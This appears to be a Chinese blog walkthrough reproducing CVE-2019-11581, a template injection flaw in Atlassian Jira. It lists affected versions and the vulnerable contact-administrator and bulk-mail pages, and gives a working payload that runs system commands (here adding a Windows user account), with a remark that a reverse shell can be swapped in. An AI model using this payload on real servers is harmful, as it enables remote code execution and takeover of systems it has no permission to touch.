Atlassian JIRA服务器模板注入漏洞复现(CVE-2019-11581) - 小胖博客-专注于网络数据分享、网络安全研究

Atlassian JIRA服务器模板注入漏洞复现(CVE-2019-11581)

作者: 小胖

全网最全的网络资源分享网站

手机扫码查看

特别声明:文章多为网络转载,资源使用一般不提供任何帮助,特殊资源除外,如有侵权请联系!

访问以下两种url

无需管理员账户权限:http://ip:port/secure/ContactAdministrators!default.jspa

需管理员账户权限:http://ip:port/secure/admin/SendBulkMail!default.jspa 

如果出现以下运行版本号则为存在漏洞。


漏洞影响范围
AtlassianJira 4.4.x
AtlassianJira 5.x.x
AtlassianJira 6.x.x
AtlassianJira 7.0.x
AtlassianJira 7.1.x
AtlassianJira 7.2.x
AtlassianJira 7.3.x
AtlassianJira 7.4.x
AtlassianJira 7.5.x
AtlassianJira 7.6.x < 7.6.14
AtlassianJira 7.7.x
AtlassianJira 7.8.x
AtlassianJira 7.9.x
AtlassianJira 7.10.x
AtlassianJira 7.11.x
AtlassianJira 7.12.x
AtlassianJira 7.13.x < 7.13.5
AtlassianJira 8.0.x < 8.0.3
AtlassianJira 8.1.x < 8.1.2
AtlassianJira 8.2.x < 8.2.3


漏洞利用

0x00 漏洞利用条件

联系管理员必须开启 || 知道后台管理员账号密码

0x01 环境准备:

腾讯云服务器(已解封25端口发邮件,注意必须要能发送邮件的服务器):118.*.*.*

Atlassian JIRAv6.3.6(存在漏洞版本)

Atlassian JIRAv6.3.6下载地址:https://product-downloads.atlassian.com/software/jira/downloads/atlassian-jira-6.3.6-x64.exe


安装过程不再描述,有问题可以回复,注意,到了邮件配置那一步经尽量选以后(默认就是),然后进入后台配置。


0x02 确认未登陆状态下漏洞存在

访问如下URL

无需管理员账户权限:http://ip:port/secure/ContactAdministrators!default.jspa

如果提示如图,这种说明没有配置联系管理员,无法触发漏洞。。。

点击查看原图

请登陆后台开启联系管理员,配置地址如下

配置地址:http://10.10.20.116:8080/secure/admin/EditApplicationProperties!default.jspa

默认是关闭的,需要配置了STMP发信后才能开启,配置STMP的时候可以测试连接,服务器必须开25端口,不然不能发邮件。。。

下图是开启成功。

2019081302.png

0x03 未登陆状态下触发漏洞

访问118.*.*.*:8080/secure/ContactAdministrators!default.jspa

在Subject填入payload,注意,我这里环境是windows机器,所以可以添加账号观察,Linux可以用反弹shell的代码等等,反正换成自己想执行的命令。


1 $i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec('net user ximcx abc@ABC123 /add').waitFor()


2019081303.png

2019081304.png

发送了后可能会等一会儿,因为要加入邮件队列。这时候再上服务器执行net user查看,发现正是刚刚执行命令添加的账户。

2019081305.png

0x04 登陆管理员账号触发漏洞

登陆管理员账号,然后访问如下URL

http://118.*.*.*:8080/secure/admin/SendBulkMail!default.jspa

填入payload,如下,注意执行命令添加账号的账户名


1 $i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec('net user ximcx2 abc@ABC123 /add').waitFor()


2019081306.png

2019081307.png


参考文章:

https://mp.weixin.qq.com/s/5FzMMTg15GsmyUhoiXEriQ

https://github.com/jas502n/CVE-2019-11581

https://paper.seebug.org/982/

分享到:
打赏
未经允许不得转载:

作者: 小胖, 转载或复制请以 超链接形式 并注明出处 小胖资源博客
原文地址: 《Atlassian JIRA服务器模板注入漏洞复现(CVE-2019-11581)》 发布于2019-8-14

评论

  1. #1
    VPS234主机测评 游客 Lv.1

    jira确实很好用,做项目管理,不过正版真的好贵啊,澳大利亚的软件公司做的[S1]

切换注册

登录

您也可以使用第三方帐号快捷登录

切换登录

注册

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

微信扫一扫打赏

快速下款,有小米手机额度更高

小米优贷日利率低至0.02%,秒下款,新用户享受最高5万免息,有小米手机额度更高.

了解一下